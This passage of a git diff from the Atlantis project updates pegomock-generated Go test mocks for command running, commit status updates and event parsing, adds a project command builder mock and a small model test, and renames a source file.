_param1[u] = param.(*models.Repo) } _param2 = make([]models.User, len(params[2])) for u, param := range params[2] { @@ -77,9 +82,48 @@ func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArgumen for u, param := range params[3] { _param3[u] = param.(int) } - _param4 = make([]*events.Command, len(params[4])) + _param4 = make([]*events.CommentCommand, len(params[4])) for u, param := range params[4] { - _param4[u] = param.(*events.Command) + _param4[u] = param.(*events.CommentCommand) + } + } + return +} + +func (verifier *VerifierCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) *CommandRunner_RunAutoplanCommand_OngoingVerification { + params := []pegomock.Param{baseRepo, headRepo, pull, user} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunAutoplanCommand", params) + return &CommandRunner_RunAutoplanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type CommandRunner_RunAutoplanCommand_OngoingVerification struct { + mock *MockCommandRunner + methodInvocations []pegomock.MethodInvocation +} + +func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.PullRequest, models.User) { + baseRepo, headRepo, pull, user := c.GetAllCapturedArguments() + return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], pull[len(pull)-1], user[len(user)-1] +} + +func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.PullRequest, _param3 []models.User) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]models.Repo, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(models.Repo) + } + _param1 = 
make([]models.Repo, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(models.Repo) + } + _param2 = make([]models.PullRequest, len(params[2])) + for u, param := range params[2] { + _param2[u] = param.(models.PullRequest) + } + _param3 = make([]models.User, len(params[3])) + for u, param := range params[3] { + _param3[u] = param.(models.User) } } return diff --git a/server/events/mocks/mock_commit_status_updater.go b/server/events/mocks/mock_commit_status_updater.go index 3ed9e933b4..e5815d4144 100644 --- a/server/events/mocks/mock_commit_status_updater.go +++ b/server/events/mocks/mock_commit_status_updater.go @@ -20,8 +20,8 @@ func NewMockCommitStatusUpdater() *MockCommitStatusUpdater { return &MockCommitStatusUpdater{fail: pegomock.GlobalFailHandler} } -func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) error { - params := []pegomock.Param{repo, pull, status, cmd} +func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) error { + params := []pegomock.Param{repo, pull, status, command} result := pegomock.GetGenericMockFrom(mock).Invoke("Update", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()}) var ret0 error if len(result) != 0 { @@ -32,8 +32,8 @@ func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRe return ret0 } -func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) error { - params := []pegomock.Param{ctx, res} +func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) error { + params := []pegomock.Param{ctx, commandName, res} result := pegomock.GetGenericMockFrom(mock).Invoke("UpdateProjectResult", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()}) var ret0 error if len(result) != 0 
{ @@ -62,8 +62,8 @@ type VerifierCommitStatusUpdater struct { inOrderContext *pegomock.InOrderContext } -func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) *CommitStatusUpdater_Update_OngoingVerification { - params := []pegomock.Param{repo, pull, status, cmd} +func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) *CommitStatusUpdater_Update_OngoingVerification { + params := []pegomock.Param{repo, pull, status, command} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Update", params) return &CommitStatusUpdater_Update_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } @@ -73,12 +73,12 @@ type CommitStatusUpdater_Update_OngoingVerification struct { methodInvocations []pegomock.MethodInvocation } -func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, *events.Command) { - repo, pull, status, cmd := c.GetAllCapturedArguments() - return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], cmd[len(cmd)-1] +func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, events.CommandName) { + repo, pull, status, command := c.GetAllCapturedArguments() + return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], command[len(command)-1] } -func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []*events.Command) { +func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []events.CommandName) { 
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { _param0 = make([]models.Repo, len(params[0])) @@ -93,16 +93,16 @@ func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments for u, param := range params[2] { _param2[u] = param.(vcs.CommitStatus) } - _param3 = make([]*events.Command, len(params[3])) + _param3 = make([]events.CommandName, len(params[3])) for u, param := range params[3] { - _param3[u] = param.(*events.Command) + _param3[u] = param.(events.CommandName) } } return } -func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification { - params := []pegomock.Param{ctx, res} +func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification { + params := []pegomock.Param{ctx, commandName, res} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "UpdateProjectResult", params) return &CommitStatusUpdater_UpdateProjectResult_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } @@ -112,21 +112,25 @@ type CommitStatusUpdater_UpdateProjectResult_OngoingVerification struct { methodInvocations []pegomock.MethodInvocation } -func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandResponse) { - ctx, res := c.GetAllCapturedArguments() - return ctx[len(ctx)-1], res[len(res)-1] +func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandName, events.CommandResult) { + ctx, commandName, res := c.GetAllCapturedArguments() + return ctx[len(ctx)-1], commandName[len(commandName)-1], 
res[len(res)-1] } -func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandResponse) { +func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandName, _param2 []events.CommandResult) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { _param0 = make([]*events.CommandContext, len(params[0])) for u, param := range params[0] { _param0[u] = param.(*events.CommandContext) } - _param1 = make([]events.CommandResponse, len(params[1])) + _param1 = make([]events.CommandName, len(params[1])) for u, param := range params[1] { - _param1[u] = param.(events.CommandResponse) + _param1[u] = param.(events.CommandName) + } + _param2 = make([]events.CommandResult, len(params[2])) + for u, param := range params[2] { + _param2[u] = param.(events.CommandResult) } } return diff --git a/server/events/mocks/mock_event_parsing.go b/server/events/mocks/mock_event_parsing.go index 007f823a40..1c1feaf31c 100644 --- a/server/events/mocks/mock_event_parsing.go +++ b/server/events/mocks/mock_event_parsing.go @@ -44,12 +44,13 @@ func (mock *MockEventParsing) ParseGithubIssueCommentEvent(comment *github.Issue return ret0, ret1, ret2, ret3 } -func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) { +func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error) { params := []pegomock.Param{pull} - result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, 
[]reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) var ret0 models.PullRequest var ret1 models.Repo - var ret2 error + var ret2 models.Repo + var ret3 error if len(result) != 0 { if result[0] != nil { ret0 = result[0].(models.PullRequest) @@ -58,10 +59,41 @@ func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models. ret1 = result[1].(models.Repo) } if result[2] != nil { - ret2 = result[2].(error) + ret2 = result[2].(models.Repo) + } + if result[3] != nil { + ret3 = result[3].(error) + } + } + return ret0, ret1, ret2, ret3 +} + +func (mock *MockEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) { + params := []pegomock.Param{pullEvent} + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPullEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 models.PullRequest + var ret1 models.Repo + var ret2 models.Repo + var ret3 models.User + var ret4 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(models.PullRequest) + } + if result[1] != nil { + ret1 = result[1].(models.Repo) + } + if result[2] != nil { + ret2 = result[2].(models.Repo) + } + if result[3] != nil { + ret3 = result[3].(models.User) + } + if result[4] != nil { + ret4 = result[4].(error) } } - return ret0, ret1, ret2 + return ret0, ret1, ret2, ret3, ret4 } func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) { @@ -80,13 +112,14 @@ func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models return ret0, ret1 } -func (mock *MockEventParsing) 
ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) { +func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) { params := []pegomock.Param{event} - result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) var ret0 models.PullRequest var ret1 models.Repo var ret2 models.Repo - var ret3 error + var ret3 models.User + var ret4 error if len(result) != 0 { if result[0] != nil { ret0 = result[0].(models.PullRequest) @@ -98,10 +131,13 @@ func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) ret2 = result[2].(models.Repo) } if result[3] != nil { - ret3 = result[3].(error) + ret3 = result[3].(models.User) + } + if result[4] != nil { + ret4 = result[4].(error) } } - return ret0, ret1, ret2, ret3 + return ret0, ret1, ret2, ret3, ret4 } func (mock *MockEventParsing) ParseGitlabMergeCommentEvent(event go_gitlab.MergeCommentEvent) (models.Repo, models.Repo, models.User, error) { @@ -212,6 +248,33 @@ func (c *EventParsing_ParseGithubPull_OngoingVerification) GetAllCapturedArgumen return } +func (verifier *VerifierEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) *EventParsing_ParseGithubPullEvent_OngoingVerification { + params := []pegomock.Param{pullEvent} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, 
verifier.invocationCountMatcher, "ParseGithubPullEvent", params) + return &EventParsing_ParseGithubPullEvent_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type EventParsing_ParseGithubPullEvent_OngoingVerification struct { + mock *MockEventParsing + methodInvocations []pegomock.MethodInvocation +} + +func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetCapturedArguments() *github.PullRequestEvent { + pullEvent := c.GetAllCapturedArguments() + return pullEvent[len(pullEvent)-1] +} + +func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetAllCapturedArguments() (_param0 []*github.PullRequestEvent) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*github.PullRequestEvent, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*github.PullRequestEvent) + } + } + return +} + func (verifier *VerifierEventParsing) ParseGithubRepo(ghRepo *github.Repository) *EventParsing_ParseGithubRepo_OngoingVerification { params := []pegomock.Param{ghRepo} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubRepo", params) diff --git a/server/events/mocks/mock_executor.go b/server/events/mocks/mock_executor.go index f3c9ce749b..208f43050e 100644 --- a/server/events/mocks/mock_executor.go +++ b/server/events/mocks/mock_executor.go @@ -18,13 +18,13 @@ func NewMockExecutor() *MockExecutor { return &MockExecutor{fail: pegomock.GlobalFailHandler} } -func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResponse { +func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResult { params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) - var ret0 events.CommandResponse + result := 
pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResult)(nil)).Elem()}) + var ret0 events.CommandResult if len(result) != 0 { if result[0] != nil { - ret0 = result[0].(events.CommandResponse) + ret0 = result[0].(events.CommandResult) } } return ret0 diff --git a/server/events/mocks/mock_project_command_builder.go b/server/events/mocks/mock_project_command_builder.go new file mode 100644 index 0000000000..f779acab36 --- /dev/null +++ b/server/events/mocks/mock_project_command_builder.go @@ -0,0 +1,175 @@ +// Automatically generated by pegomock. DO NOT EDIT! +// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectCommandBuilder) + +package mocks + +import ( + "reflect" + + pegomock "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" + models "github.com/runatlantis/atlantis/server/events/models" +) + +type MockProjectCommandBuilder struct { + fail func(message string, callerSkip ...int) +} + +func NewMockProjectCommandBuilder() *MockProjectCommandBuilder { + return &MockProjectCommandBuilder{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) ([]models.ProjectCommandContext, error) { + params := []pegomock.Param{ctx} + result := pegomock.GetGenericMockFrom(mock).Invoke("BuildAutoplanCommands", params, []reflect.Type{reflect.TypeOf((*[]models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 []models.ProjectCommandContext + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].([]models.ProjectCommandContext) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) { + params := []pegomock.Param{ctx, commentCommand} + result 
:= pegomock.GetGenericMockFrom(mock).Invoke("BuildPlanCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 models.ProjectCommandContext + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(models.ProjectCommandContext) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) { + params := []pegomock.Param{ctx, commentCommand} + result := pegomock.GetGenericMockFrom(mock).Invoke("BuildApplyCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 models.ProjectCommandContext + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(models.ProjectCommandContext) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockProjectCommandBuilder) VerifyWasCalledOnce() *VerifierProjectCommandBuilder { + return &VerifierProjectCommandBuilder{mock, pegomock.Times(1), nil} +} + +func (mock *MockProjectCommandBuilder) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectCommandBuilder { + return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, nil} +} + +func (mock *MockProjectCommandBuilder) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectCommandBuilder { + return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierProjectCommandBuilder struct { + mock *MockProjectCommandBuilder + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) 
*ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification { + params := []pegomock.Param{ctx} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildAutoplanCommands", params) + return &ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification struct { + mock *MockProjectCommandBuilder + methodInvocations []pegomock.MethodInvocation +} + +func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetCapturedArguments() *events.CommandContext { + ctx := c.GetAllCapturedArguments() + return ctx[len(ctx)-1] +} + +func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + } + return +} + +func (verifier *VerifierProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification { + params := []pegomock.Param{ctx, commentCommand} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildPlanCommand", params) + return &ProjectCommandBuilder_BuildPlanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ProjectCommandBuilder_BuildPlanCommand_OngoingVerification struct { + mock *MockProjectCommandBuilder + methodInvocations []pegomock.MethodInvocation +} + +func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, 
*events.CommentCommand) { + ctx, commentCommand := c.GetAllCapturedArguments() + return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1] +} + +func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + _param1 = make([]*events.CommentCommand, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(*events.CommentCommand) + } + } + return +} + +func (verifier *VerifierProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification { + params := []pegomock.Param{ctx, commentCommand} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildApplyCommand", params) + return &ProjectCommandBuilder_BuildApplyCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ProjectCommandBuilder_BuildApplyCommand_OngoingVerification struct { + mock *MockProjectCommandBuilder + methodInvocations []pegomock.MethodInvocation +} + +func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) { + ctx, commentCommand := c.GetAllCapturedArguments() + return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1] +} + +func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = 
make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + _param1 = make([]*events.CommentCommand, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(*events.CommentCommand) + } + } + return +} diff --git a/server/events/mocks/mock_pull_request_operator.go b/server/events/mocks/mock_pull_request_operator.go deleted file mode 100644 index 443636863a..0000000000 --- a/server/events/mocks/mock_pull_request_operator.go +++ /dev/null @@ -1,154 +0,0 @@ -// Automatically generated by pegomock. DO NOT EDIT! -// Source: github.com/runatlantis/atlantis/server/events (interfaces: PullRequestOperator) - -package mocks - -import ( - "reflect" - - pegomock "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" -) - -type MockPullRequestOperator struct { - fail func(message string, callerSkip ...int) -} - -func NewMockPullRequestOperator() *MockPullRequestOperator { - return &MockPullRequestOperator{fail: pegomock.GlobalFailHandler} -} - -func (mock *MockPullRequestOperator) Autoplan(ctx *events.CommandContext) events.CommandResponse { - params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("Autoplan", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) - var ret0 events.CommandResponse - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.CommandResponse) - } - } - return ret0 -} - -func (mock *MockPullRequestOperator) PlanViaComment(ctx *events.CommandContext) events.CommandResponse { - params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("PlanViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) - var ret0 events.CommandResponse - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.CommandResponse) - } - } - return ret0 -} - -func (mock *MockPullRequestOperator) 
ApplyViaComment(ctx *events.CommandContext) events.CommandResponse { - params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("ApplyViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) - var ret0 events.CommandResponse - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.CommandResponse) - } - } - return ret0 -} - -func (mock *MockPullRequestOperator) VerifyWasCalledOnce() *VerifierPullRequestOperator { - return &VerifierPullRequestOperator{mock, pegomock.Times(1), nil} -} - -func (mock *MockPullRequestOperator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullRequestOperator { - return &VerifierPullRequestOperator{mock, invocationCountMatcher, nil} -} - -func (mock *MockPullRequestOperator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullRequestOperator { - return &VerifierPullRequestOperator{mock, invocationCountMatcher, inOrderContext} -} - -type VerifierPullRequestOperator struct { - mock *MockPullRequestOperator - invocationCountMatcher pegomock.Matcher - inOrderContext *pegomock.InOrderContext -} - -func (verifier *VerifierPullRequestOperator) Autoplan(ctx *events.CommandContext) *PullRequestOperator_Autoplan_OngoingVerification { - params := []pegomock.Param{ctx} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Autoplan", params) - return &PullRequestOperator_Autoplan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type PullRequestOperator_Autoplan_OngoingVerification struct { - mock *MockPullRequestOperator - methodInvocations []pegomock.MethodInvocation -} - -func (c *PullRequestOperator_Autoplan_OngoingVerification) GetCapturedArguments() *events.CommandContext { - ctx := c.GetAllCapturedArguments() - return ctx[len(ctx)-1] -} - -func (c 
*PullRequestOperator_Autoplan_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - } - return -} - -func (verifier *VerifierPullRequestOperator) PlanViaComment(ctx *events.CommandContext) *PullRequestOperator_PlanViaComment_OngoingVerification { - params := []pegomock.Param{ctx} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PlanViaComment", params) - return &PullRequestOperator_PlanViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type PullRequestOperator_PlanViaComment_OngoingVerification struct { - mock *MockPullRequestOperator - methodInvocations []pegomock.MethodInvocation -} - -func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext { - ctx := c.GetAllCapturedArguments() - return ctx[len(ctx)-1] -} - -func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - } - return -} - -func (verifier *VerifierPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) *PullRequestOperator_ApplyViaComment_OngoingVerification { - params := []pegomock.Param{ctx} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ApplyViaComment", params) - return 
&PullRequestOperator_ApplyViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type PullRequestOperator_ApplyViaComment_OngoingVerification struct { - mock *MockPullRequestOperator - methodInvocations []pegomock.MethodInvocation -} - -func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext { - ctx := c.GetAllCapturedArguments() - return ctx[len(ctx)-1] -} - -func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - } - return -} diff --git a/server/events/models/models_test.go b/server/events/models/models_test.go index 0dbb4f49ff..5883f21936 100644 --- a/server/events/models/models_test.go +++ b/server/events/models/models_test.go @@ -92,3 +92,10 @@ func TestNewRepo_HTTPSAuth(t *testing.T) { Name: "repo", }, repo) } + +func TestProject_String(t *testing.T) { + Equals(t, "repofullname=owner/repo path=my/path", (models.Project{ + RepoFullName: "owner/repo", + Path: "my/path", + }).String()) +} diff --git a/server/events/pull_request_operator.go b/server/events/project_command_builder.go similarity index 62% rename from server/events/pull_request_operator.go rename to server/events/project_command_builder.go index fabad33d0f..90f2324dd8 100644 --- a/server/events/pull_request_operator.go +++ b/server/events/project_command_builder.go @@ -15,41 +15,45 @@ import ( "github.com/runatlantis/atlantis/server/logging" ) -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_request_operator.go PullRequestOperator +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o 
